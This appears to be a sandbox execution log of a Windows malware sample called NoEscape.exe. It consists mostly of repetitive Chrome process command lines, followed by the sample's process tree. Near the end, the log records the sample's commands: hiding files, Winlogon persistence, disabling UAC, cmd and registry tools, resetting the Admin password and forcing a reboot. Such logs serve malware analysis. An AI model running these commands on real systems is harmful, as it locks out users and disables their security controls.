"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=67 --mojo-platform-channel-handle=4492 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=68 --mojo-platform-channel-handle=3576 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=69 --mojo-platform-channel-handle=4612 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=70 --mojo-platform-channel-handle=6624 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=71 --mojo-platform-channel-handle=4860 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --mojo-platform-channel-handle=2788 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=73 --mojo-platform-channel-handle=4556 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=74 --mojo-platform-channel-handle=2360 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=75 --mojo-platform-channel-handle=4480 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=76 --mojo-platform-channel-handle=2376 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=77 --mojo-platform-channel-handle=4784 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --mojo-platform-channel-handle=6132 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=79 --mojo-platform-channel-handle=6500 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=80 --mojo-platform-channel-handle=6464 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=81 --mojo-platform-channel-handle=4804 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=82 --mojo-platform-channel-handle=5304 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=83 --mojo-platform-channel-handle=2352 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=84 --mojo-platform-channel-handle=4120 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=85 --mojo-platform-channel-handle=5092 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=86 --mojo-platform-channel-handle=3876 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=87 --mojo-platform-channel-handle=6428 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=88 --mojo-platform-channel-handle=6444 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=89 --mojo-platform-channel-handle=4076 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=90 --mojo-platform-channel-handle=4176 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=91 --mojo-platform-channel-handle=5196 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=92 --mojo-platform-channel-handle=2720 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=93 --mojo-platform-channel-handle=5456 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=94 --mojo-platform-channel-handle=3848 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3576 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=96 --mojo-platform-channel-handle=5012 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5016 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3844 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=99 --mojo-platform-channel-handle=5452 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=100 --mojo-platform-channel-handle=6572 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=101 --mojo-platform-channel-handle=2404 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=102 --mojo-platform-channel-handle=4976 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=103 --mojo-platform-channel-handle=1200 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=104 --mojo-platform-channel-handle=5260 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=105 --mojo-platform-channel-handle=2404 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=106 --mojo-platform-channel-handle=5824 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=107 --mojo-platform-channel-handle=2796 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=108 --mojo-platform-channel-handle=4760 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=109 --mojo-platform-channel-handle=1616 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=110 --mojo-platform-channel-handle=2820 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=111 --mojo-platform-channel-handle=6160 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=112 --mojo-platform-channel-handle=5144 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=113 --mojo-platform-channel-handle=5068 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5284 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3396 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=116 --mojo-platform-channel-handle=1620 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=117 --mojo-platform-channel-handle=4732 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=118 --mojo-platform-channel-handle=5020 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=119 --mojo-platform-channel-handle=4084 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4720 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6624 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=122 --mojo-platform-channel-handle=2452 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=123 --mojo-platform-channel-handle=5456 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=124 --mojo-platform-channel-handle=4100 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=125 --mojo-platform-channel-handle=5952 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=126 --mojo-platform-channel-handle=3884 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3832 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4016 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\NoEscape.exe
"C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\NoEscape.exe"
C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\NoEscape.exe
"C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\NoEscape.exe"
C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\vc_redist.x86.exe
"C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\vc_redist.x86.exe"
C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\vc_redist.x86.exe
"C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\vc_redist.x86.exe" -burn.unelevated BurnPipe.{8512F291-0252-49B2-B1A1-A18DCAB98C88} {6E44AD99-92B3-4C13-9C1E-F33174794440} 1540
C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\NoEscape.exe
"C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\NoEscape.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=129 --mojo-platform-channel-handle=2764 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=130 --mojo-platform-channel-handle=584 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=131 --mojo-platform-channel-handle=3360 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=132 --mojo-platform-channel-handle=4780 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=133 --mojo-platform-channel-handle=4024 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=134 --mojo-platform-channel-handle=4384 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5096 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6160 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4024 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3340 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4744 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Users\Admin\Downloads\No Escape.exe
"C:\Users\Admin\Downloads\No Escape.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3992 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Windows\system32\wscript.exe
"C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\957C.tmp\957D.tmp\957E.vbs //Nologo
C:\Windows\system32\cmd.exe
cmd /c ""C:\Program Files (x86)\hello.bat" "
C:\Windows\system32\attrib.exe
attrib +s +h C:\msg.exe
C:\Windows\system32\attrib.exe
attrib +s +h C:\launch.exe
C:\Windows\regedit.exe
regedit /s hello.reg
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System /v DisableLogonBackgroundImage /t REG_DWORD /d 1
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d C:\Windows\system32\userinit.exe,C:\launch.exe /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\control panel\desktop" /v wallpaper /t REG_SZ /d C:\hello.jpg /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1
C:\Windows\system32\reg.exe
reg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2
C:\Windows\system32\reg.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\system32\net.exe
net user Admin death
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user Admin death
C:\Windows\system32\shutdown.exe
shutdown /t 0 /r
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.google.com | udp |
